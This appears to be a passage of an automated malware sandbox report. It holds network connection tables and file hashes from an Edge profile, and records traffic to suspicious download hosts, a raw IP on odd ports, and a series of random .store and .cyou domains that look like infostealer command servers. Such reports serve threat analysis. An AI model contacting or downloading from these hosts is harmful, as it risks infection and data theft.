| GB | 74.125.168.232:443 | rr3---sn-aigzrnsl.googlevideo.com | udp |
| US | 1.1.1.1:53 | 232.168.125.74.in-addr.arpa | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | www.google.com | udp |
| US | 1.1.1.1:53 | ade.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | www.google.com | udp |
| AU | 1.0.0.1:53 | fonts.gstatic.com | udp |
| AU | 1.0.0.1:53 | ade.googlesyndication.com | udp |
| US | 1.1.1.1:53 | ade.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | ade.googlesyndication.com | udp |
| US | 1.1.1.1:53 | rr1---sn-aigl6nsd.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr1---sn-aigl6nsd.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr1.sn-aigl6nsd.googlevideo.com | udp |
| GB | 74.125.105.38:443 | rr1.sn-aigl6nsd.googlevideo.com | tcp |
| GB | 74.125.105.38:443 | rr1.sn-aigl6nsd.googlevideo.com | tcp |
| AU | 1.0.0.1:53 | rr1.sn-aigl6nsd.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr1.sn-aigl6nsd.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr1.sn-aigl6nsd.googlevideo.com | udp |
| GB | 74.125.105.38:443 | rr1.sn-aigl6nsd.googlevideo.com | udp |
| US | 1.1.1.1:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | udp |
| AU | 1.0.0.1:53 | www.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | 38.105.125.74.in-addr.arpa | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | 38.105.125.74.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | i1.ytimg.com | udp |
| AU | 1.0.0.1:53 | i1.ytimg.com | udp |
| GB | 142.250.179.238:443 | i1.ytimg.com | tcp |
| US | 1.1.1.1:53 | i1.ytimg.com | udp |
| AU | 1.0.0.1:53 | i1.ytimg.com | udp |
| US | 1.1.1.1:53 | i1.ytimg.com | udp |
| AU | 1.0.0.1:53 | i1.ytimg.com | udp |
| GB | 142.250.179.238:443 | i1.ytimg.com | udp |
| US | 1.1.1.1:53 | rr5---sn-ntqe6n7r.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5---sn-ntqe6n7r.googlevideo.com | udp |
| AU | 74.125.109.10:443 | rr5---sn-ntqe6n7r.googlevideo.com | tcp |
| AU | 74.125.109.10:443 | rr5---sn-ntqe6n7r.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr5.sn-ntqe6n7r.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5.sn-ntqe6n7r.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr5.sn-ntqe6n7r.googlevideo.com | udp |
| US | 1.1.1.1:53 | jnn-pa.googleapis.com | udp |
| US | 1.1.1.1:53 | static.doubleclick.net | udp |
| GB | 142.250.187.230:443 | static.doubleclick.net | udp |
| AU | 1.0.0.1:53 | rr5.sn-ntqe6n7r.googlevideo.com | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | jnn-pa.googleapis.com | udp |
| AU | 1.0.0.1:53 | static.doubleclick.net | udp |
| US | 1.1.1.1:53 | jnn-pa.googleapis.com | udp |
| AU | 1.0.0.1:53 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.42:443 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.42:443 | jnn-pa.googleapis.com | tcp |
| US | 1.1.1.1:53 | rr5---sn-ntqe6n7r.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5---sn-ntqe6n7r.googlevideo.com | udp |
| AU | 74.125.109.10:443 | rr5---sn-ntqe6n7r.googlevideo.com | tcp |
| AU | 74.125.109.10:443 | rr5---sn-ntqe6n7r.googlevideo.com | tcp |
| US | 1.1.1.1:53 | photos-ugc.l.googleusercontent.com | udp |
| AU | 1.0.0.1:53 | photos-ugc.l.googleusercontent.com | udp |
| GB | 172.217.169.36:443 | www.google.com | udp |
| US | 1.1.1.1:53 | rr5---sn-q4fl6ndl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5---sn-q4fl6ndl.googlevideo.com | udp |
| US | 173.194.141.10:443 | rr5---sn-q4fl6ndl.googlevideo.com | tcp |
| US | 173.194.141.10:443 | rr5---sn-q4fl6ndl.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr5.sn-q4fl6ndl.googlevideo.com | udp |
| US | 1.1.1.1:53 | 10.109.125.74.in-addr.arpa | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | rr5.sn-q4fl6ndl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | 10.109.125.74.in-addr.arpa | udp |
| US | 1.1.1.1:53 | rr5.sn-q4fl6ndl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5.sn-q4fl6ndl.googlevideo.com | udp |
| AU | 74.125.109.10:443 | rr5---sn-ntqe6n7r.googlevideo.com | tcp |
| AU | 74.125.109.10:443 | rr5---sn-ntqe6n7r.googlevideo.com | tcp |
| AU | 74.125.109.10:443 | rr5---sn-ntqe6n7r.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr5---sn-q4fl6ndl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5---sn-q4fl6ndl.googlevideo.com | udp |
| US | 173.194.141.10:443 | rr5---sn-q4fl6ndl.googlevideo.com | tcp |
| US | 173.194.141.10:443 | rr5---sn-q4fl6ndl.googlevideo.com | tcp |
| AU | 74.125.109.10:443 | rr5---sn-ntqe6n7r.googlevideo.com | tcp |
| US | 173.194.141.10:443 | rr5---sn-q4fl6ndl.googlevideo.com | tcp |
| US | 173.194.141.10:443 | rr5---sn-q4fl6ndl.googlevideo.com | tcp |
| AU | 1.0.0.1:53 | 10.141.194.173.in-addr.arpa | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | getexpl.org | udp |
| AU | 1.0.0.1:53 | getexpl.org | udp |
| US | 172.67.203.184:443 | getexpl.org | tcp |
| US | 1.1.1.1:53 | getexpl.org | udp |
| AU | 1.0.0.1:53 | getexpl.org | udp |
| US | 1.1.1.1:53 | getexpl.org | udp |
| AU | 1.0.0.1:53 | getexpl.org | udp |
| US | 1.1.1.1:53 | 184.203.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 184.203.67.172.in-addr.arpa | udp |
| US | 172.67.203.184:443 | getexpl.org | udp |
| US | 1.1.1.1:53 | darknessonyx.com | udp |
| AU | 1.0.0.1:53 | darknessonyx.com | udp |
| NL | 185.212.130.204:443 | darknessonyx.com | tcp |
| US | 1.1.1.1:53 | darknessonyx.com | udp |
| AU | 1.0.0.1:53 | darknessonyx.com | udp |
| US | 1.1.1.1:53 | darknessonyx.com | udp |
| AU | 1.0.0.1:53 | darknessonyx.com | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | cdn.jsdelivr.net | udp |
| US | 1.1.1.1:53 | cdn.tailwindcss.com | udp |
| AU | 1.0.0.1:53 | cdn.jsdelivr.net | udp |
| AU | 1.0.0.1:53 | cdn.tailwindcss.com | udp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | tcp |
| US | 1.1.1.1:53 | jsdelivr.map.fastly.net | udp |
| US | 104.22.21.144:443 | cdn.tailwindcss.com | tcp |
| US | 1.1.1.1:53 | cdn.tailwindcss.com | udp |
| AU | 1.0.0.1:53 | jsdelivr.map.fastly.net | udp |
| AU | 1.0.0.1:53 | cdn.tailwindcss.com | udp |
| US | 1.1.1.1:53 | jsdelivr.map.fastly.net | udp |
| US | 1.1.1.1:53 | cdn.tailwindcss.com | udp |
| AU | 1.0.0.1:53 | jsdelivr.map.fastly.net | udp |
| AU | 1.0.0.1:53 | cdn.tailwindcss.com | udp |
| US | 1.1.1.1:53 | 229.129.101.151.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 204.130.212.185.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 144.21.22.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 204.130.212.185.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 229.129.101.151.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 144.21.22.104.in-addr.arpa | udp |
| US | 151.101.129.229:443 | jsdelivr.map.fastly.net | udp |
| US | 1.1.1.1:53 | www.mediafire.com | udp |
| AU | 1.0.0.1:53 | www.mediafire.com | udp |
| US | 1.1.1.1:53 | www.mediafire.com | udp |
| US | 104.17.151.117:443 | www.mediafire.com | udp |
| AU | 1.0.0.1:53 | www.mediafire.com | udp |
| US | 1.1.1.1:53 | www.mediafire.com | udp |
| AU | 1.0.0.1:53 | www.mediafire.com | udp |
| AU | 1.0.0.1:53 | download2346.mediafire.com | udp |
| US | 199.91.155.87:443 | download2346.mediafire.com | tcp |
| US | 1.1.1.1:53 | download2346.mediafire.com | udp |
| US | 1.1.1.1:53 | download2346.mediafire.com | udp |
| AU | 1.0.0.1:53 | download2346.mediafire.com | udp |
| US | 1.1.1.1:53 | 87.155.91.199.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 87.155.91.199.in-addr.arpa | udp |
| US | 1.1.1.1:53 | rt3065.infolinks.com | udp |
| AU | 1.0.0.1:53 | rt3065.infolinks.com | udp |
| US | 1.1.1.1:53 | rt3065.infolinks.com | udp |
| AU | 1.0.0.1:53 | rt3065.infolinks.com | udp |
| US | 1.1.1.1:53 | rt3065.infolinks.com | udp |
| AU | 1.0.0.1:53 | pagead2.googlesyndication.com | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | config.edge.skype.com | udp |
| US | 1.1.1.1:53 | 87.242.123.52.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 87.242.123.52.in-addr.arpa | udp |
| US | 1.1.1.1:53 | resources.infolinks.com | udp |
| AU | 1.0.0.1:53 | resources.infolinks.com | udp |
| AU | 1.0.0.1:53 | resources.infolinks.com | udp |
| US | 1.1.1.1:53 | resources.infolinks.com | udp |
| AU | 1.0.0.1:53 | resources.infolinks.com | udp |
| US | 1.1.1.1:53 | play.google.com | udp |
| AU | 1.0.0.1:53 | play.google.com | udp |
| DE | 18.156.199.224:443 | btlr-eu-central-1.sharethrough.com | tcp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| US | 1.1.1.1:53 | cdn.ampproject.org | udp |
| US | 104.21.87.79:443 | bshr.ezodn.com | udp |
| AU | 1.0.0.1:53 | cdn.ampproject.org | udp |
| US | 1.1.1.1:53 | cdn-content.ampproject.org | udp |
| GB | 216.58.204.65:443 | cdn.ampproject.org | udp |
| AU | 1.0.0.1:53 | cdn-content.ampproject.org | udp |
| AU | 1.0.0.1:53 | fonts.gstatic.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| DE | 147.45.47.37:2001 | 147.45.47.37 | tcp |
| US | 1.1.1.1:53 | 37.47.45.147.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 37.47.45.147.in-addr.arpa | udp |
| DE | 147.45.47.37:1488 | 147.45.47.37 | tcp |
| US | 1.1.1.1:53 | github.com | udp |
| AU | 1.0.0.1:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 1.1.1.1:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 1.1.1.1:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 133.109.199.185.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 215.156.26.20.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| GB | 163.70.147.35:443 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | 35.147.70.163.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 35.147.70.163.in-addr.arpa | udp |
| US | 1.1.1.1:53 | www.youtube.com | udp |
| AU | 1.0.0.1:53 | www.youtube.com | udp |
| US | 1.1.1.1:53 | youtube-ui.l.google.com | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | nld-prebid.a-mx.net | udp |
| US | 1.1.1.1:53 | btlr.sharethrough.com | udp |
| AU | 1.0.0.1:53 | btlr.sharethrough.com | udp |
| US | 1.1.1.1:53 | nld-prebid.a-mx.net | udp |
| US | 1.1.1.1:53 | btlr-eu-central-1.sharethrough.com | udp |
| DE | 18.199.220.232:443 | btlr.sharethrough.com | tcp |
| AU | 1.0.0.1:53 | nld-prebid.a-mx.net | udp |
| US | 1.1.1.1:53 | btlr-eu-central-1.sharethrough.com | udp |
| AU | 1.0.0.1:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | 232.220.199.18.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 232.220.199.18.in-addr.arpa | udp |
| US | 1.1.1.1:53 | cdn-content.ampproject.org | udp |
| GB | 216.58.204.65:443 | cdn.ampproject.org | udp |
| US | 1.1.1.1:53 | go.ezodn.com | udp |
| AU | 1.0.0.1:53 | cdn-content.ampproject.org | udp |
| AU | 1.0.0.1:53 | go.ezodn.com | udp |
| US | 1.1.1.1:53 | go.ezodn.com | udp |
| US | 104.21.87.79:443 | go.ezodn.com | udp |
| AU | 1.0.0.1:53 | go.ezodn.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 1.1.1.1:53 | www.google.co.uk | udp |
| US | 1.1.1.1:53 | www.google.co.uk | udp |
| AU | 1.0.0.1:53 | www.google.co.uk | udp |
| US | 1.1.1.1:53 | www.facebook.com | udp |
| GB | 163.70.147.35:443 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | www.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| DE | 18.199.220.232:443 | btlr.sharethrough.com | tcp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| GB | 216.58.204.65:443 | cdn.ampproject.org | udp |
| US | 104.21.87.79:443 | go.ezodn.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| GB | 157.240.225.35:443 | www.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | 35.225.240.157.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 35.225.240.157.in-addr.arpa | udp |
| US | 1.1.1.1:53 | bitbucket.org | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 1.1.1.1:53 | bbuseruploads.s3.amazonaws.com | udp |
| AU | 1.0.0.1:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.90.172:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 1.1.1.1:53 | 21.142.166.185.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 172.90.217.52.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 172.90.217.52.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 21.142.166.185.in-addr.arpa | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 52.217.90.172:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 1.1.1.1:53 | raw.githubusercontent.com | udp |
| AU | 1.0.0.1:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 1.1.1.1:53 | bbuseruploads.s3.amazonaws.com | udp |
| AU | 1.0.0.1:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.216.144.171:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 1.1.1.1:53 | 133.111.199.185.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 171.144.216.52.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 171.144.216.52.in-addr.arpa | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 52.216.144.171:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 1.1.1.1:53 | withdrwblon.cyou | udp |
| AU | 1.0.0.1:53 | withdrwblon.cyou | udp |
| US | 172.67.171.155:443 | withdrwblon.cyou | tcp |
| US | 1.1.1.1:53 | presticitpo.store | udp |
| AU | 1.0.0.1:53 | presticitpo.store | udp |
| US | 172.67.170.64:443 | crisiwarny.store | tcp |
| US | 1.1.1.1:53 | fadehairucw.store | udp |
| AU | 1.0.0.1:53 | fadehairucw.store | udp |
| US | 1.1.1.1:53 | thumbystriw.store | udp |
| AU | 1.0.0.1:53 | thumbystriw.store | udp |
| US | 1.1.1.1:53 | necklacedmny.store | udp |
| US | 1.1.1.1:53 | 155.171.67.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 64.170.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | necklacedmny.store | udp |
| AU | 1.0.0.1:53 | 64.170.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 155.171.67.172.in-addr.arpa | udp |
| US | 104.21.54.135:443 | necklacedmny.store | tcp |
| US | 1.1.1.1:53 | founpiuer.store | udp |
| AU | 1.0.0.1:53 | founpiuer.store | udp |
| US | 172.67.133.135:443 | founpiuer.store | tcp |
| US | 1.1.1.1:53 | navygenerayk.store | udp |
| AU | 1.0.0.1:53 | navygenerayk.store | udp |
| US | 104.21.56.225:443 | navygenerayk.store | tcp |
| US | 1.1.1.1:53 | 135.54.21.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 135.133.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 135.133.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 135.54.21.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | scriptyprefej.store | udp |
| AU | 1.0.0.1:53 | scriptyprefej.store | udp |
| US | 1.1.1.1:53 | steamcommunity.com | udp |
| AU | 1.0.0.1:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| DE | 18.199.220.232:443 | btlr.sharethrough.com | tcp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | 225.56.21.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 109.234.82.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 109.234.82.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 225.56.21.104.in-addr.arpa | udp |
| GB | 216.58.204.65:443 | cdn.ampproject.org | udp |
| US | 104.21.87.79:443 | go.ezodn.com | udp |
| US | 1.1.1.1:53 | go.ezodn.com | udp |
| AU | 1.0.0.1:53 | go.ezodn.com | udp |
| AU | 1.0.0.1:53 | fonts.gstatic.com | udp |
| US | 1.1.1.1:53 | region1.analytics.google.com | udp |
| US | 1.1.1.1:53 | www.google.co.uk | udp |
| AU | 1.0.0.1:53 | region1.analytics.google.com | udp |
| AU | 1.0.0.1:53 | www.google.co.uk | udp |
| US | 1.1.1.1:53 | region1.analytics.google.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| AU | 1.0.0.1:53 | region1.analytics.google.com | udp |
| US | 1.1.1.1:53 | region1.analytics.google.com | udp |
| AU | 1.0.0.1:53 | region1.analytics.google.com | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | pagead2.googlesyndication.com | udp |
| US | 1.1.1.1:53 | 98.201.58.216.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 98.201.58.216.in-addr.arpa | udp |
| US | 1.1.1.1:53 | www.facebook.com | udp |
| GB | 157.240.225.35:443 | www.facebook.com | udp |
| AU | 1.0.0.1:53 | www.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| DE | 18.199.220.232:443 | btlr.sharethrough.com | tcp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| GB | 216.58.204.65:443 | cdn.ampproject.org | udp |
| US | 104.21.87.79:443 | go.ezodn.com | udp |
| US | 1.1.1.1:53 | tpc.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| US | 1.1.1.1:53 | tpc.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | pagead2.googlesyndication.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 1.1.1.1:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | www.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 32d05d01d96358f7d334df6dab8b12ed |
| SHA1 | 7b371e4797603b195a34721bb21f0e7f1e2929da |
| SHA256 | 287349738fb9020d95f6468fa4a98684685d0195ee5e63e717e4b09aa99b402e |
| SHA512 | e7f73b1af7c7512899728708b890acd25d4c68e971f84d2d5bc24305f972778d8bced6a3c7e3d9f977cf2fc82e0d9e3746a6ccb0f9668a709ac8a4db290c551c |
\??\pipe\LOCAL\crashpad_1712_XHFYAKGWNXBLZBMI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | e5e3377341056643b0494b6842c0b544 |
| SHA1 | d53fd8e256ec9d5cef8ef5387872e544a2df9108 |
| SHA256 | e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25 |
| SHA512 | 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b5fffb9ed7c2c7454da60348607ac641 |
| SHA1 | 8d1e01517d1f0532f0871025a38d78f4520b8ebc |
| SHA256 | c8dddfb100f2783ecbb92cec7f878b30d6015c2844296142e710fb9e10cc7c73 |
| SHA512 | 9182a7b31363398393df0e9db6c9e16a14209630cb256e16ccbe41a908b80aa362fc1a736bdfa94d3b74c3db636dc51b717fc31d33a9fa26c3889dec6c0076a7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d275dfda614362a1ac4cd353d796859e |
| SHA1 | 3d32cff608b36c42f01851100be449d43c3fa549 |
| SHA256 | dc875b0513973f57f650d0902dc765c8c1c48534a44cee31935a915997dbe10f |
| SHA512 | 2b6cd667041b652ca1d9c8bcd0226ba2cfcf406d14c5ddff643042d40796ac9707c18d56e43a6668720944b279d5beff0e9f52c566ce5f637be6ba9bf0b8d25f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 6e466bd18b7f6077ca9f1d3c125ac5c2 |
| SHA1 | 32a4a64e853f294d98170b86bbace9669b58dfb8 |
| SHA256 | 74fc4f126c0a55211be97a17dc55a73113008a6f27d0fc78b2b47234c0389ddc |
| SHA512 | 9bd77ee253ce4d2971a4b07ed892526ed20ff18a501c6ba2a180c92be62e4a56d4bbf20ba3fc4fbf9cf6ce68b3817cb67013ad5f30211c5af44c1e98608cb9e3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | ae45753c8ebf3a39da055a5a7f11d5ff |
| SHA1 | 9370708919dff31878f6fc7f1c5df854cfaa6613 |
| SHA256 | 450ac12ab8edf5d3438085bda8dee86d04071b47297c30612517860f612d4f29 |
| SHA512 | 77d556ab6b1c7e84791537edbc30011d71dc0708f05e5d21899c91c0157f83041fa584be2985bfee5a48c8010e51c5e8a17e408366889497916d00bb445eb45f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 82e3c9b32b07ba8e82cff584a063e1e5 |
| SHA1 | 886844ed6e97f0d31ebbf589986e62b4b420377a |
| SHA256 | 8515c513da2cc0f2bef97b0cd62051a40ce3ee57aea2547080d69bfeab87a981 |
| SHA512 | 66141b9f7866010b7f20574d43d1e105cd3210dd7791c1a8f32241ece400776d63b9546e98080ed6774f9220fde843d1620b4f0630b24526c866618ef369fa7c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
